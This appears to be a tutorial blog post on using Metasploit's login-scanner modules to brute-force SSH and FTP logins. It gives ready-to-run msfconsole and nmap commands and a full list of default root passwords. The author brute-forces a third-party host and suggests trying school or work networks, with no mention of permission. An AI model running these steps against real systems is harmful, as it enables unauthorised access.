Metasploit has been a great help to all penetration testers, students, infosec enthusiasts, exploiters, etc.
Aside from client side exploits, we can actually use Metasploit as a login scanner and a brute force attack tool which is one of the common attacks or a known simple vulnerability scanning method. Take note of this article because this will be useful in CPLT – Level 1 Course under Class 8: Password Attacks if ever you are currently enrolled in that course =).
Now to fire up metasploit, we need to grab the terminal and type:
msfconsole
Alright, because Metasploit has a lot of modules and comes with exploits and payloads, it will be hard memorizing all the payloads and exploits so that’s why we use the command ‘search <string>’ to find a specific exploit that matches your string. You can also use the commands ‘show exploits’ and ‘show payloads’ respectively in order to list all the exploits and the payloads. And because our goal in this article is to utilize Metasploit as a scanner then we need to filter our search to scanners only. Thus, we can just type in the terminal:
search scanner
Sample Modules of Login Scanners:
SMB Login Checker = auxiliary/scanner/smb/smb_login
VNC Authentication None Scanner = auxiliary/scanner/vnc/vnc_none_auth
Open X11 scanner = auxiliary/scanner/x11/open_x11
SSH Login Scanner = auxiliary/scanner/ssh/ssh_login
Telnet Login Check Scanner = auxiliary/scanner/telnet/telnet_login
TFTP Brute Forcer = auxiliary/scanner/tftp/tftpbrute
FTP Login Check Scanner = auxiliary/scanner/ftp/ftp_login
SAP Management Console Brute Force = auxiliary/scanner/sap/sap_mgmt_con_brute_login
So take for example I want to use the module for utilizing Metasploit as a SSH Login Scanner, I can just type:
use auxiliary/scanner/ssh/ssh_login
To know about this module and read its description, we enter the command:
info auxiliary/scanner/ssh/ssh_login
Module Description: ”This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.”
Thus, the current auxiliary module can be used as a bruteforce attack tool too.
To check what needs to be set for the module like options for setting up your target, dictionary/wordlist, and the limit,etc. You just need to type in your terminal:
show options
Now let’s setup the IP of the target:
set RHOSTS 144.xxx.x.x
To set your dictionary to be used for scanning, type: set USERPASS_FILE /path
Metasploit has a lot of wordlists too. There is this file named as root_userpass.txt which is one of the Metasploit wordlists, to find this file we can just type:
find / -name root_userpass.txt
In my case, the path for the wordlist is /opt/framework/msf3/data/wordlists/root_userpass.txt. So if I want to use this under the USERPASS_FILE options, we issue the command:
set USERPASS_FILE /opt/framework/msf3/data/wordlists/root_userpass.txt
Here’s what’s inside ‘root_userpass.txt’:
root
root !root
root Cisco
root NeXT
root QNX
root admin
root attack
root ax400
root bagabu
root blablabla
root blender
root brightmail
root calvin
root changeme
root changethis
root default
root fibranne
root honey
root jstwo
root kn1TG7psLu
root letacla
root mpegvideo
root nsi
root par0t
root pass
root password
root pixmet2003
root resumix
root root
root rootme
root rootpass
root t00lk1t
root tini
root toor
root trendimsa1.0
root tslinux
root uClinux
root vertex25
root owaspbwa
root permit
root ascend
root ROOT500
root cms500
root fivranne
root davox
root letmein
root powerapp
root dbps
root ibm
root monitor
It contains users and passwords separated by space, one pair per line.
You can actually edit the wordlist and add another common username and password in the next line.
I decided to use the wordlist from Piata SSH Scanner (Mass SSH Scanner) that’s why I set it to:
set USERPASS_FILE /root/piata/pass_file
Now this is how to start the scanning process after all the options are configured. In the screenshot below, I am brute focing a known honeypot I found in the web that’s why I censored its IP address.
run
– Successful logins will be marked 'Success'–
Okay, now let’s try to login the host using the login credentials based on the wordlist…
"I GOT IN!"
Finally, another example:
Here’s a situation: You are connected to a network at school, work or at your home and you want to test if they have secure passwords for their logins. We can use nmap to scan ports:
nmap -Pn -A 192.168.10.1/24
Here is a screenshot of a Nmap scan report for the IP Address: 192.168.10.7 which will be our target for this example.
From what we can see from the image above, it says that port 21 is open which is for FTP. Thus, we have a clue that we can use the FTP Login Check Scanner which is auxiliary/scanner/ftp/ftp_login .
use auxiliary/scanner/ftp/ftp_login
info auxiliary/scanner/ftp/ftp_login
Description: “This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Options:
Setting up the target which is 192.168.10.7:
set RHOSTS 192.168.10.7
This time we will be using a different approach which is user guessing. The box or the host is a dreambox right? In the common default passwords lists on the Internet, dreamboxes have ‘root’ as their default username and ‘dreambox’ as their password. So we can set our settings to:
set USERNAME root
set PASSWORD dreambox
Now fire up the attack:
run
Or if you want to use your password list, you just omit the USERNAME and PASSWORD options and use the USERPASS_FILE which is intended for files that contain users and passwords separated by space, one pair per line.
set USERPASS_FILE /opt/framework/msf3/data/wordlists/root_userpass.txt
In most cases, FTP, SSH and Telnet have the same logins. Dreambox’s port 23 is open too which is for Telnet Access. So let’s try logging in from its port 23 using the same username and password from its FTP.
telnet 192.168.10.7
The web interface also prompts a login, I used the same login credentials and this is what I got:
What’s next? Try scanning your own network and use some of Metasploit’s Login Scanners 
References: http://www.offensive-security.com/metasploit-unleashed/
